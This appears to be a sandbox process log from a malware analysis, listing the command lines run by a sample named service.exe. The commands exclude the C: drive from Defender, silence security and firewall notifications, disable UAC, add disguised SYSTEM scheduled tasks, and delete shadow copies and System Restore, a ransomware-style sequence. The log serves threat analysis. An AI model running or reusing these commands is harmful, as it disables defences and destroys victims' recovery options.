Service.exe(进程ID:2896) 命令行:"c:\users\admin\appdata\local\temp\service.exe" cmd.exe(进程ID:5844) 命令行:cmd /c babel.bat powershell.exe(进程ID:1844) 命令行:PowerShell -NoProfile -ExecutionPolicy Bypass -Command "$defenderExclusions = Get-MpPreference; $defenderExclusions.ExclusionPath = $defenderExclusions.ExclusionPath + 'C:\'; Set-MpPreference -ExclusionPath $defenderExclusions.ExclusionPath" reg.exe(进程ID:1816) 命令行:reg.exe ADD HKCU\Software\Policies\Microsoft\Windows Defender Security Center\Notifications /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f reg.exe(进程ID:4912) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.WindowsDefender.SecurityCenter.Notifications /v Enabled /t REG_DWORD /d 0 /f reg.exe(进程ID:5216) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\WindowsDefenderSecurityCenter /v Enabled /t REG_DWORD /d 0 /f reg.exe(进程ID:5764) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance /v Enabled /t REG_DWORD /d 0 /f reg.exe(进程ID:3164) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f reg.exe(进程ID:4492) 命令行:reg.exe ADD HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile /v DisableNotifications /t REG_DWORD /d 1 /f reg.exe(进程ID:4496) 命令行:reg.exe ADD HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile /v DisableNotifications /t REG_DWORD /d 1 /f reg.exe(进程ID:1948) 命令行:reg.exe ADD HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile /v DisableNotifications /t REG_DWORD /d 1 /f reg.exe(进程ID:3480) 命令行:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Notifications /v SCNotifyEnabled /t REG_DWORD /d 0 /f reg.exe(进程ID:5320) 命令行:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f schtasks.exe(进程ID:4412) 命令行:schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDeviceSecurityAlert" /tr "powershell -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\Programs\Common\NUL\mbam.ps1"" /sc once /st 00:00 /du 9999:59 /ri 58 /ru "SYSTEM" /RL HIGHEST /F schtasks.exe(进程ID:4108) 命令行:schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange" /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /sc once /st 00:00 /du 9999:59 /ri 60 /RL HIGHEST /F vssadmin.exe(进程ID:3932) 命令行:vssadmin delete shadows /for=c: /all /quiet net.exe(进程ID:6232) 命令行:net stop VSS /y net1.exe(进程ID:6248) 命令行:C:\Windows\system32\net1 stop VSS /y reg.exe(进程ID:6324) 命令行:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /f /v DisableSR /t REG_DWORD /d 1 reg.exe(进程ID:6352) 命令行:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /f /v DisableConfig /t REG_DWORD /d 1 cmd.exe(进程ID:6384) 命令行:"c:\windows\System32\cmd.exe" /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\" rundll32.exe(进程ID:6592) 命令行:rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\" cmd.exe(进程ID:6392) 命令行:"c:\windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Local\Programs\Common\NUL\mbam.ps1 powershell.exe(进程ID:6584) 命令行:powershell -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Local\Programs\Common\NUL\mbam.ps1 cmd.exe(进程ID:6400) 命令行:"c:\windows\System32\cmd.exe" /c C:\ProgramData\MicrosoftTool\current\Microsoft.exe